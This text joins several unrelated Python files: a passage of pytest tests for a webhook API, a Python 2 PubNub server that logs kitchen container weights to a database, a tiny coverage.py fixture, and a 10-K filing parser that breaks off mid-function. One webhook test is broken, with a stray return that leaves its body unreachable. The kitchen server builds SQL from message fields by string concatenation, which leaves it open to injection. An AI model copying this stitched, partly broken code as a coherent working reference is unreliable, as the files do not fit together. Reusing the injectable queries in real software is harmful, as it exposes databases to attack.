return V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=policy.key, pre_webhook_key=policy_pre_execution_webhooks[0].key
)
def test_patch_pre_execution_webhook_unauthenticated(self, url, api_client):
resp = api_client.patch(url)
assert resp.status_code == 401
def test_patch_pre_execution_webhook_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.patch(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_patch_pre_execution_webhook_invalid_webhook_key(
self, api_client, generate_auth_header, policy
):
return V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=policy.key, pre_webhook_key="invalid_webhook_key"
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.patch(
url,
headers=auth_header,
)
assert resp.status_code == 404
def test_path_pre_execution_webhook_invalid_order(
self, generate_auth_header, api_client, url, policy_pre_execution_webhooks
):
request_body = {"order": 5}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 400
response_body = json.loads(resp.text)
assert (
response_body["detail"]
== "Cannot set order to 5: there are only 2 PolicyPreWebhook(s) defined on this Policy."
)
def test_update_name_only(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
request_body = {"name": "Renaming this webhook"}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 200
response_body = json.loads(resp.text)
assert response_body == {
"resource": {
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": "Renaming this webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
"new_order": [],
}
webhook = PolicyPreWebhook.filter(
db=db, conditions=(PolicyPreWebhook.key == "pre_execution_one_way_webhook")
).first()
assert webhook.order == 0
def test_update_name_and_order(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
request_body = {"name": "Renaming this webhook", "order": 1}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 200
response_body = json.loads(resp.text)
assert response_body == {
"resource": {
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": "Renaming this webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
"new_order": [
{"key": "pre_execution_two_way_webhook", "order": 0},
{"key": "pre_execution_one_way_webhook", "order": 1},
],
}
webhook = PolicyPreWebhook.filter(
db=db, conditions=(PolicyPreWebhook.key == "pre_execution_one_way_webhook")
).first()
db.refresh(webhook)
assert webhook.order == 1
class TestPatchPostExecutionPolicyWebhook:
"""Test updating a single PolicyPostWebhook - however, updates to "order" can affect the orders of other webhooks
This endpoint shares code with the pre-execution PATCH - see TestPatchPreExecutionPolicyWebhook
"""
@pytest.fixture(scope="function")
def url(self, policy, policy_post_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
def test_patch_post_execution_webhook_unauthenticated(self, url, api_client):
resp = api_client.patch(url)
assert resp.status_code == 401
def test_patch_post_execution_webhook_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.patch(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_update_name_and_order_and_direction(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
webhook = PolicyPostWebhook.filter(
db=db, conditions=(PolicyPostWebhook.key == "cache_busting_webhook")
).first()
db.refresh(webhook)
assert webhook.order == 0
request_body = {
"name": "Better Webhook Name",
"order": 1,
"direction": "two_way",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 200
response_body = json.loads(resp.text)
assert response_body == {
"resource": {
"direction": "two_way",
"key": "cache_busting_webhook",
"name": "Better Webhook Name",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
"new_order": [
{"key": "cleanup_webhook", "order": 0},
{"key": "cache_busting_webhook", "order": 1},
],
}
db.refresh(webhook)
assert webhook.order == 1
class TestDeletePolicyPreWebhook:
@pytest.fixture(scope="function")
def url(self, policy, policy_pre_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=policy.key, pre_webhook_key=policy_pre_execution_webhooks[0].key
)
def test_delete_pre_execution_webhook(self, url, api_client):
resp = api_client.delete(url)
assert resp.status_code == 401
def test_delete_pre_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_delete_pre_execution_webhook_detail_and_reorder(
self,
url,
api_client,
generate_auth_header,
policy,
policy_pre_execution_webhooks,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_DELETE])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"new_order": [{"key": policy_pre_execution_webhooks[1].key, "order": 0}]
}
assert policy.pre_execution_webhooks.count() == 1
class TestDeletePolicyPostWebhook:
@pytest.fixture(scope="function")
def url(self, policy, policy_post_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
def test_delete_pre_execution_webhook(self, url, api_client):
resp = api_client.delete(url)
assert resp.status_code == 401
def test_delete_post_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_delete_post_execution_webhook_detail_and_reorder(
self,
url,
api_client,
generate_auth_header,
policy,
policy_post_execution_webhooks,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_DELETE])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"new_order": [{"key": policy_post_execution_webhooks[1].key, "order": 0}]
}
assert policy.post_execution_webhooks.count() == 1
url = V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[1].key,
)
resp = api_client.delete(
url,
headers=auth_header,
)
body = json.loads(resp.text)
assert body == {"new_order": []}
assert policy.post_execution_webhooks.count() == 0
|
'''*********************************************************************************
SERVER - KITCHEN TRACKER
*********************************************************************************'''
#Import the Modules Required
import os
from pubnub import Pubnub
import datetime
from dateutil.relativedelta import relativedelta
import ConfigParser
import logging
# Modules for the dashDB
import ibm_db
from ibm_db import connect, active
#Importing the Config File and Parsing the file using the ConfigParser
config_file = "./config.ini"
Config = ConfigParser.ConfigParser()
Config.read(config_file)
logging.basicConfig(filename='logger.log',level=logging.DEBUG)
#CONSTANTS
TIMESPAN_FOR_HISTORY = 7
REFILL_STATUS = 0
CONSUMPTION_STATUS = 1
#CONTAINER ID's
CONTAINER_1 = "001"
CONTAINER_2 = "002"
#DATA STRUCTURES
#KEY = ContainerID VALE = Label,Expiry in Months, Critical Level, End Date
g_containerSettings = dict()
SETTINGS_LABEL = 0
SETTINGS_EXPIRY = 1
SETTINGS_CRITICAL_LEVEL = 2
SETTINGS_END_DATE = 3
#KEY = ContainerID VALE = Present Weight, Previous Weight, Total Refill, Total Consumed, Start Date, Expiry Estimate, Start Time
g_containerStatus = dict()
STATUS_PRESENT_WEIGHT = 0
STATUS_PREVIOUS_WEIGHT = 1
STATUS_TOTAL_REFILL = 2
STATUS_TOTAL_CONSUMED = 3
STATUS_START_DATE = 4
EXPIRY_ESTIMATE = 5
STATUS_START_TIME = 6
#KEY = Label VALUE = Container ID, Present Weight, Critical Level, Expiry in Days, Status(Refill/Consumed)
g_containerMessage = dict()
EXPIRY_UPDATE = 3
#KEY = Container ID VALUE = Present DATE, Consumend Value
g_perdayConsumption = dict()
CONSUM_DATE = 0
CONSUM_QTY = 1
#KEY = Container ID VALUE = Present DATE, Refill Value
g_perdayRefill = dict()
REFILL_DATE = 0
REFILL_QTY = 1
'''****************************************************************************************
Function Name : ConfigSectionMap
Description : Parsing the Config File and Extracting the data and returning it
Parameters : section - section to be parserd
****************************************************************************************'''
def ConfigSectionMap(section):
dict1 = {}
options = Config.options(section)
for option in options:
try:
dict1[option] = Config.get(section, option)
if dict1[option] == -1:
DebugPrint("skip: %s" % option)
except:
logging.debug("exception on %s!" % option)
dict1[option] = None
return dict1
# Initialize the Pubnub Keys
PUB_KEY = ConfigSectionMap("pubnub_init")['pub_key']
SUB_KEY = ConfigSectionMap("pubnub_init")['sub_key']
#Database Related Variables and Lists
DB_SCHEMA = ConfigSectionMap("database")['db_schema']
DB_HOST = ConfigSectionMap("database")['db_host']
DB_NAME = ConfigSectionMap("database")['db_name']
DATABASE_TABLE_NAME = ConfigSectionMap("database")['table_name']
DB_USER_NAME = ConfigSectionMap("database")['username']
DB_PASSWORD = ConfigSectionMap("database")['pwd']
DB_PORT = ConfigSectionMap("database")['port']
#Expiry Selection
EXPIRY_SELECT = int(ConfigSectionMap("expirySelector")['expiry'])
'''****************************************************************************************
Function Name : init
Description : Initalize the pubnub keys and Starts Subscribing from the
kitchenDevice-resp and kitchenApp-req channels
Parameters : None
****************************************************************************************'''
def init():
#Pubnub Initialization
global pubnub
pubnub = Pubnub(publish_key=PUB_KEY,subscribe_key=SUB_KEY)
pubnub.subscribe(channels='kitchenDevice-resp', callback=callback, error=callback, reconnect=reconnect, disconnect=disconnect)
pubnub.subscribe(channels='kitchenApp-req', callback=appcallback, error=appcallback, reconnect=reconnect, disconnect=disconnect)
'''****************************************************************************************
Function Name : dB_init
Description : Initalize the Database and establishing the connection between the
database and the kitchen-tracker
Parameters : None
****************************************************************************************'''
def dB_init():
dbtry = 0
while (dbtry < 3):
try:
if 'VCAP_SERVICES' in os.environ:
hasVcap = True
import json
vcap_services = json.loads(os.environ['VCAP_SERVICES'])
if 'dashDB' in vcap_services:
hasdashDB = True
service = vcap_services['dashDB'][0]
credentials = service["credentials"]
url = 'DATABASE=%s;uid=%s;pwd=%s;hostname=%s;port=%s;' % ( credentials["db"],credentials["username"],credentials["password"],credentials["host"],credentials["port"])
else:
hasdashDB = False
else:
hasVcap = False
url = 'DATABASE=%s;uid=%s;pwd=%s;hostname=%s;port=%s;' % (DB_NAME,DB_USER_NAME,DB_PASSWORD,DB_HOST,DB_PORT)
connection = ibm_db.connect(url, '', '')
if (active(connection)):
return connection
except Exception as error:
logging.debug("dataBase connection_ERROR : " + str(error))
dbtry+=1
return None
'''****************************************************************************************
Function Name : defaultLoader
Description : Initialize the container Status, loads the container and updates
the historical graph
Parameters : None
****************************************************************************************'''
def defaultLoader(p_containerid,p_expiryInMonths):
#KEY = ContainerID VALE = Present Weight, Previous Weight, Total Refill, Total Consumed, Start Date, Expiry Estimate, Start Time
g_containerStatus.setdefault(p_containerid, [0.00,0.00,0.00,0.00,0,0,0,0])
#Inital Update for the APP for the Empty Container and Setting UP
pubnub.publish(channel="kitchenApp-resp", message={g_containerSettings[p_containerid][SETTINGS_LABEL]:[p_containerid,0.00,g_containerSettings[p_containerid][SETTINGS_CRITICAL_LEVEL],p_expiryInMonths,0],"warning":"!!Registration Success!!"})
g_containerMessage.setdefault(g_containerSettings[p_containerid][SETTINGS_LABEL],[p_containerid,0.00,g_containerSettings[p_containerid][SETTINGS_CRITICAL_LEVEL],p_expiryInMonths,0])
#Initial Query for the History and Graph
appHistoricalGraph(p_containerid,TIMESPAN_FOR_HISTORY)
#Loading the Default Values
g_perdayRefill.setdefault(p_containerid, [datetime.datetime.now().date(),0.00])
g_perdayConsumption.setdefault(p_containerid, [datetime.datetime.now().date(),0])
'''****************************************************************************************
Function Name : appSetting
Description : Handles the Request sent from an app and register the container settings
Parameters : p_requester - Request sent from APP
p_containerid - Respective Container ID
p_contatinerlabel - Register the container label for the ID
p_expiryInMonths - Register the expiry
p_criticallevel - Register the critical level of the container
****************************************************************************************'''
def appSetting(p_requester,p_containerid,p_containerlabel,p_expiryInMonths,p_criticallevel):
if(p_requester == "APP"):
# Container Label, Expiry in Months, Critical Level, End Date
if(not g_containerSettings.has_key(p_containerid) and not g_containerMessage.has_key(p_containerlabel)):
if EXPIRY_SELECT == 0:
g_containerSettings[p_containerid] = [p_containerlabel,p_expiryInMonths,p_criticallevel,(datetime.datetime.today() + relativedelta(months=p_expiryInMonths))]
else:
g_containerSettings[p_containerid] = [p_containerlabel,p_expiryInMonths,p_criticallevel,(datetime.datetime.now() + relativedelta(hours=p_expiryInMonths))]
defaultLoader(p_containerid,p_expiryInMonths)
else:
pubnub.publish(channel="kitchenApp-resp", message={"warning":"ID/Name is already registered"})
'''****************************************************************************************
Function Name : appReset
Description : Handles the Request sent from an app and reset the container settings
Parameters : p_requester - Request sent from APP
p_containerid - Respective Container ID
****************************************************************************************'''
def appReset(p_requester,p_containerid):
if(p_requester == "APP"):
if(g_containerSettings.has_key(p_containerid)):
del g_containerMessage[g_containerSettings[p_containerid][SETTINGS_LABEL]],g_containerSettings[p_containerid]
g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT] = 0
g_containerStatus[p_containerid][EXPIRY_ESTIMATE] = 0
else:
logging.warning("Container ID has not been registered")
'''****************************************************************************************
Function Name : updateCurrentStatus
Description : Updates the Refill/Consumed Data to the Database and the APP
Parameters : p_currentDate - Present date uploaded on DB
p_containerid - Container ID which should be updated
p_status - Refill / Consumed
p_weight - Current Weight to be uploaded to the database
****************************************************************************************'''
def updateCurrentStatus(p_currentDate,p_containerid,p_status,p_weight,p_statusWeight):
# Weight, Critical Level, Expiry in Days, Refill/Consumed
g_containerMessage[g_containerSettings[p_containerid][SETTINGS_LABEL]] = [p_containerid,p_weight,g_containerSettings[p_containerid][SETTINGS_CRITICAL_LEVEL],g_containerStatus[p_containerid][EXPIRY_ESTIMATE],p_status]
pubnub.publish(channel="kitchenApp-resp", message=g_containerMessage)
#Uploads the status data to the DB
if(p_status == REFILL_STATUS):
dataBaseUpload(p_currentDate,p_containerid,p_status,p_statusWeight)
logging.info("Data Uploaded on Refill")
else:
dataBaseUpload(p_currentDate,p_containerid,p_status,p_statusWeight)
logging.info("Data Uploaded on Consumption")
'''****************************************************************************************
Function Name : updateExpiry
Description : Updates the Expiry Date/Minutes
Parameters : p_containerid - Respective Container ID
p_status - Refill / Consumed
****************************************************************************************'''
def updateExpiry(p_containerid,p_status):
if g_containerSettings.has_key(p_containerid) and g_containerStatus[p_containerid][EXPIRY_ESTIMATE] >= 0:
g_containerStatus[p_containerid][STATUS_START_DATE] = datetime.datetime.today()
if p_status == 0:
if EXPIRY_SELECT == 0:
#End Date = Today date + Months
g_containerSettings[p_containerid][SETTINGS_END_DATE] = g_containerStatus[p_containerid][STATUS_START_DATE] + relativedelta(months=g_containerSettings[p_containerid][SETTINGS_EXPIRY])
g_containerStatus[p_containerid][EXPIRY_ESTIMATE] = g_containerSettings[p_containerid][SETTINGS_END_DATE] - g_containerStatus[p_containerid][STATUS_START_DATE]
g_containerStatus[p_containerid][EXPIRY_ESTIMATE] = g_containerStatus[p_containerid][EXPIRY_ESTIMATE].days
else:
#End Time = Today Time + Minutes
g_containerSettings[p_containerid][SETTINGS_END_DATE] = g_containerStatus[p_containerid][STATUS_START_DATE] + relativedelta(minutes=g_containerSettings[p_containerid][SETTINGS_EXPIRY])
l_timeDiffrence = g_containerSettings[p_containerid][SETTINGS_END_DATE] - g_containerStatus[p_containerid][STATUS_START_DATE]
g_containerStatus[p_containerid][EXPIRY_ESTIMATE] = divmod(l_timeDiffrence.days * 86400 + l_timeDiffrence.seconds, 60)[0]
else:
if EXPIRY_SELECT == 0:
g_containerStatus[p_containerid][EXPIRY_ESTIMATE] = g_containerSettings[p_containerid][SETTINGS_END_DATE] - g_containerStatus[p_containerid][STATUS_START_DATE]
g_containerStatus[p_containerid][EXPIRY_ESTIMATE] = g_containerStatus[p_containerid][EXPIRY_ESTIMATE].days
else:
l_timeDiffrence = g_containerSettings[p_containerid][SETTINGS_END_DATE] - g_containerStatus[p_containerid][STATUS_START_DATE]
g_containerStatus[p_containerid][EXPIRY_ESTIMATE] = divmod(l_timeDiffrence.days * 86400 + l_timeDiffrence.seconds, 60)[0]
#Updates the Expiry on Each App Refresh
g_containerMessage[g_containerSettings[p_containerid][SETTINGS_LABEL]][EXPIRY_UPDATE] = g_containerStatus[p_containerid][EXPIRY_ESTIMATE]
'''****************************************************************************************
Function Name : containerWeight
Description : Once the device responses the present weight the server handles the
data and evaluvates the container is refilled / consumed
Parameters : p_containerid - Container ID which is updated
p_weight - Present Weight of the respective container
****************************************************************************************'''
def containerWeight(p_containerid,p_weight):
global DATABASE_TABLE_NAME
g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT] = p_weight
l_todayDate = datetime.datetime.now().date()
if(g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT] > g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT]):
if(g_perdayRefill[p_containerid][REFILL_DATE] != l_todayDate):
del g_perdayRefill[p_containerid]
g_perdayRefill.setdefault(p_containerid, [l_todayDate,0.00])
logging.info(p_containerid + " Item Refill")
# Calculate and Update the Per day Refill Value = Per Day Total Refill + current refill
g_perdayRefill[p_containerid][REFILL_QTY] = g_perdayRefill[p_containerid][REFILL_QTY] + (g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT] - g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT])
# Calculate and Update the Total Refill Value = Total refill + current refill
g_containerStatus[p_containerid][STATUS_TOTAL_REFILL] = g_containerStatus[p_containerid][STATUS_TOTAL_REFILL] + (g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT] - g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT])
g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT] = g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT]
if(g_containerSettings.has_key(p_containerid)):
# Calculates for expiry date in days
updateExpiry(p_containerid,REFILL_STATUS)
updateCurrentStatus(l_todayDate,p_containerid,REFILL_STATUS,p_weight,g_perdayRefill[p_containerid][REFILL_QTY])
else:
if(g_perdayConsumption[p_containerid][CONSUM_DATE] != l_todayDate):
del g_perdayConsumption[p_containerid]
g_perdayConsumption.setdefault(p_containerid, [l_todayDate,0])
logging.info(p_containerid + " Item Consumed")
# Calculate and Update the Per day Consumption Value = Consumption + current Consumption
g_perdayConsumption[p_containerid][CONSUM_QTY] = g_perdayConsumption[p_containerid][CONSUM_QTY] + (g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT] - g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT])
# Calculate and Update the Total Consumption Value = Consumption + current Consumption
g_containerStatus[p_containerid][STATUS_TOTAL_CONSUMED] = g_containerStatus[p_containerid][STATUS_TOTAL_CONSUMED] + (g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT] - g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT])
g_containerStatus[p_containerid][STATUS_PREVIOUS_WEIGHT] = g_containerStatus[p_containerid][STATUS_PRESENT_WEIGHT]
if(g_containerSettings.has_key(p_containerid)):
updateExpiry(p_containerid,CONSUMPTION_STATUS)
updateCurrentStatus(l_todayDate,p_containerid,CONSUMPTION_STATUS,p_weight,g_perdayConsumption[p_containerid][CONSUM_QTY])
'''****************************************************************************************
Function Name : dataBaseUpload
Description : Upload the Refill/Consumed Status and Quantity to the DB
Parameters : p_todayDate - Respective Date
p_containerid - Respective Container ID
p_status - Status of the Update : Refill/ consumed
0 - Refill
1 - Consumed
p_quantity - Present Quantity to be uploaded to DB
****************************************************************************************'''
def dataBaseUpload(p_todayDate,p_containerid,p_status,p_quantity):
global DATABASE_TABLE_NAME
l_checkData_length = dict()
#Connecting to the database
l_connection = dB_init()
if(l_connection == None):
logging.error("Database Connection Failed on Database Upload")
return
#Current Time upload on the database
l_time = datetime.datetime.now().strftime('%H:%M:%S')
p_todayDate = p_todayDate.strftime('%Y-%m-%d')
l_date_query = "SELECT COUNT(*) FROM "+DB_SCHEMA+"."+DATABASE_TABLE_NAME+" WHERE DATES = '"+str(p_todayDate)+"'AND STATUS = '"+str(p_status)+"' AND SCALE_ID = '"+p_containerid+"'"
try:
l_db_statement = ibm_db.exec_immediate(l_connection, l_date_query)
l_checkData_length = ibm_db.fetch_assoc(l_db_statement)
except Exception as e:
logging.error("dataBaseUpload_datequery_ERROR : " + str(e))
if(l_checkData_length.has_key('1') and (int(l_checkData_length['1'])) == 0):
instert_data = "INSERT INTO "+DB_SCHEMA+"."+DATABASE_TABLE_NAME +" VALUES "+"('"+p_containerid+"','"+p_todayDate+"','"+str(l_time)+"','"+str(p_quantity)+"','"+str(p_status)+"')"
try:
l_db_statement = ibm_db.exec_immediate(l_connection, instert_data)
except Exception as e:
logging.error("dataBaseUpload_insertdata_ERROR : " + str(e))
else:
update_query = "UPDATE "+DB_SCHEMA+"."+DATABASE_TABLE_NAME +" SET TIME = '"+str(l_time)+"', QUANTITY = '"+str(p_quantity)+"' WHERE DATES='" + str(p_todayDate) +"' AND STATUS ='"+str(p_status)+"' AND SCALE_ID = '"+p_containerid+"'"
try:
l_db_statement = ibm_db.exec_immediate(l_connection, update_query)
except Exception as e:
logging.error("dataBaseUpload_updatequery_ERROR : " + str(e))
#Closing the Database Connection
ibm_db.free_stmt(l_db_statement)
ibm_db.close(l_connection)
'''****************************************************************************************
Function Name : appHistoricalGraph
Description : Requests the db for the past history with timespan and updates the
data to the app
Parameters : p_containerid - Respective contianer
p_timeSpan - Time Span to request the dB for the data
****************************************************************************************'''
def appHistoricalGraph(p_containerid,p_timeSpan):
global DATABASE_TABLE_NAME
#Connecting to the database
l_connection = dB_init()
if(l_connection == None):
logging.error("Database Connection Failed on Database Query")
return
#Evaluvating the number of days to query the db
p_timeSpan = p_timeSpan - 1
l_refill_history = dict()
l_consumption_history = dict()
l_temp_dict = dict()
l_sdat = datetime.datetime.now().date()
l_edat = l_sdat - datetime.timedelta(days=p_timeSpan)
l_sdate = l_sdat.strftime('%Y-%m-%d')
l_edate = l_edat.strftime('%Y-%m-%d')
#Parsing the data from the database and update the dictionary with respective time span
for i in range(p_timeSpan,-1,-1):
l_edat_loop = l_sdat - datetime.timedelta(days=i)
l_edate_loop = l_edat_loop.strftime('%Y-%m-%d')
l_refill_history[l_edate_loop] = [p_containerid,0,0,0]
l_consumption_history[l_edate_loop] = [p_containerid,0,0,0]
l_twodate_query = "SELECT * FROM "+DB_SCHEMA+"."+DATABASE_TABLE_NAME +" WHERE DATES BETWEEN DATE(\'" + l_edate + "\') AND DATE(\'" + l_sdate + "\') AND SCALE_ID =" + p_containerid
try:
l_db_statement = ibm_db.exec_immediate(l_connection, l_twodate_query)
l_temp_dict = ibm_db.fetch_assoc(l_db_statement)
except Exception as e:
logging.error("appHistoricalGraph_twodatequery exec/fetch_ERROR : " + str(e))
while l_temp_dict:
if(l_temp_dict["SCALE_ID"] == p_containerid):
l_date = l_temp_dict["DATES"].strftime('%Y-%m-%d')
if(l_temp_dict["STATUS"] == 0):
l_refill_history[l_date] = [l_temp_dict["SCALE_ID"],l_temp_dict["TIME"],"%.2f"%l_temp_dict["QUANTITY"],l_temp_dict["STATUS"]]
else:
l_consumption_history[l_date] = [l_temp_dict["SCALE_ID"],l_temp_dict["TIME"],"%.2f"%l_temp_dict["QUANTITY"],l_temp_dict["STATUS"]]
try:
l_temp_dict = ibm_db.fetch_assoc(l_db_statement)
except Exception as e:
logging.error("appHistoricalGraph_twodatequery fetch_ERROR : " + str(e))
pubnub.publish(channel="kitchenApp-refillHistory", message=l_refill_history)
pubnub.publish(channel="kitchenApp-consumptionHistory", message=l_consumption_history)
#deleting the history
del l_refill_history,l_consumption_history
#Closing the Database Connection
ibm_db.free_stmt(l_db_statement)
ibm_db.close(l_connection)
'''****************************************************************************************
Function Name : appUpdate
Description : Once the app is loaded, app request for the update. On request the
server responds with the current status.
Parameters : p_requester - Request sent from APP
****************************************************************************************'''
def appUpdate(p_requester):
if p_requester == "APP":
#Initial Data to be updated with the app
if(len(g_containerSettings) > 0):
updateExpiry(CONTAINER_1,CONSUMPTION_STATUS)
updateExpiry(CONTAINER_2,CONSUMPTION_STATUS)
pubnub.publish(channel="kitchenApp-resp", message=g_containerMessage)
else:
logging.warning("Containers are not registered")
'''****************************************************************************************
Function Name : callback
Description : Waits for the message from the kitchenDevice-resp channel
Parameters : message - Sensor Status sent from the hardware
channel - channel for the callback
****************************************************************************************'''
def callback(message, channel):
if(message.has_key("containerID") and message.has_key("weight") and g_containerSettings.has_key(message["containerID"])):
containerWeight(message["containerID"],message["weight"])
else:
logging.warning("Invalid details received on Hardware response")
'''****************************************************************************************
Function Name : appcallback
Description : Waits for the Request sent from the APP
Parameters : message - Request sent from the app
channel - channel for the appcallback
****************************************************************************************'''
def appcallback(message, channel):
if(message.has_key("requester") and message.has_key("requestType")):
if(message["requestType"] == 0):
appSetting(message["requester"],message["containerID"],message["containerLabel"],message["expiryMonths"],message["criticalLevel"])
elif(message["requestType"] == 1):
appReset(message["requester"],message["containerID"])
elif(message["requestType"] == 2):
appHistoricalGraph(message["containerID"],message["timeSpan"])
elif(message["requestType"] == 3):
appUpdate(message["requester"])
else:
logging.warning("Invalid details received on APP Request")
'''****************************************************************************************
Function Name : error
Description : If error in the channel, prints the error
Parameters : message - error message
****************************************************************************************'''
def error(message):
logging.error("ERROR on Pubnub: " + str(message))
'''****************************************************************************************
Function Name : reconnect
Description : Responds if server connects with pubnub
Parameters : message
****************************************************************************************'''
def reconnect(message):
logging.info("RECONNECTED")
'''****************************************************************************************
Function Name : disconnect
Description : Responds if server disconnects from pubnub
Parameters : message
****************************************************************************************'''
def disconnect(message):
logging.info("DISCONNECTED")
if __name__ == '__main__':
#Initialize the Script
init()
#End of the Script
##*****************************************************************************************************##
|
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://bitbucket.org/ned/coveragepy/src/default/NOTICE.txt
# My egg file!
walrus = "Eggman"
says = "coo-coo cachoo"
|
import sec_parser
import preprocessor
import dask
import dask.dataframe as dd
from dask.diagnostics import ProgressBar
import os
import re
import pandas as pd
from functools import partial
def get_html(file_path):
with open(file_path, 'r') as fh:
contents = fh.read()
html = re.search(r'<html>.+?</html>', contents, re.DOTALL | re.I)
if html:
return html.group()
else:
return False
def write_to_file(contents, file_path):
if not contents:
return
dir_path = '/'+'/'.join(file_path.split('/')[0:-1])
if not os.path.exists(dir_path):
os.makedirs(dir_path)
with open(file_path, 'w') as fh:
fh.write(contents)
return
def get_file_paths(dir_path, extension=None):
file_paths = []
for root, dirs, files in os.walk(dir_path):
for file in files:
if extension:
if file.endswith(extension):
file_paths.append(os.path.join(root, file))
else:
file_paths.append(os.path.join(root, file))
return file_paths
def execute_html_parse(html_file_path, parsed_dir_path, preprocess=True,
fuzzy_threshold=0.8, marked_html=False, max_num_missing_items=0):
if os.path.isfile(html_file_path):
with open(html_file_path, 'r') as fh:
contents = fh.read()
file_name = html_file_path.split('/')[-1]
parse_dict, marked_html_str = sec_parser.parse_items(contents, fuzzy_threshold=fuzzy_threshold, marked_html=marked_html,
max_num_missing_items=max_num_missing_items)
if parse_dict:
print('parsing completed successfully for file: ', file_name)
print()
if preprocess:
parse_dict = {label: preprocessor.preprocess_html(html_str) for label, html_str in parse_dict.items()}
print('pre-processing completed successfully for file: ', file_name)
for label, item_html in parse_dict.items():
new_file_name = file_name.replace('.htm', '_' + label + '.htm')
new_file_path = parsed_dir_path+file_name.replace('.htm','')+'/'+new_file_name
write_to_file(item_html, new_file_path)
new_file_name = file_name.replace('.htm', '_' + 'marked' + '.htm')
new_file_path = parsed_dir_path + file_name.replace('.htm', '') + '/' + new_file_name
write_to_file(marked_html_str, new_file_path)
return True
else:
print('parsing failed for file: ', file_name)
print()
return False
else:
return False
def execute_parallel(dfrow, preprocess=True, fuzzy_threshold=0.8, marked_html=False, max_num_missing_items=0):
file_path = dfrow['file_path']
print('processing file: ', file_path)
print()
try:
if file_path.endswith('.txt'):
html_file_path = dfrow['html_dir_path'] + file_path.split('/')[-1].replace('.txt', '.htm')
write_to_file(get_html(file_path), html_file_path)
file_path = html_file_path
execute_html_parse(file_path, dfrow['parsed_dir_path'],
preprocess=preprocess, fuzzy_threshold=fuzzy_threshold, marked_html=marked_html, max_num_missing_items=max_num_missing_items)
return True
except:
print('something went wrong during processing of file: ', file_path)
print()
return False
def apply_parallel(df, func, get=dask.multiprocessing.get, npartitions=7):
ddf = dd.from_pandas(df, npartitions=npartitions, sort=False)
with ProgressBar():
return ddf.apply(func, meta=df.columns, axis=1).compute(get=get)
def main():
root_project_path = '/Users/dimitryslavin/Dropbox/all_docs/Education/UM_PhD_Docs/phd_research/sec_firm_mapping_clean/'
file_dir_path = root_project_path+'data/10k_sample/raw_text_10k/'
html_dir_path = root_project_path+'data/10k_sample/data_html_test/'
parsed_dir_path = root_project_path+'data/10k_sample/data_parsed_test/'
results_file_path = root_project_path+'data/10k_sample/parse_results.csv'
file_paths = get_file_paths(html_dir_path, extension = '.htm')
combos = list(zip(file_paths, [html_dir_path]*len(file_paths), [parsed_dir_path]*len(file_paths)))
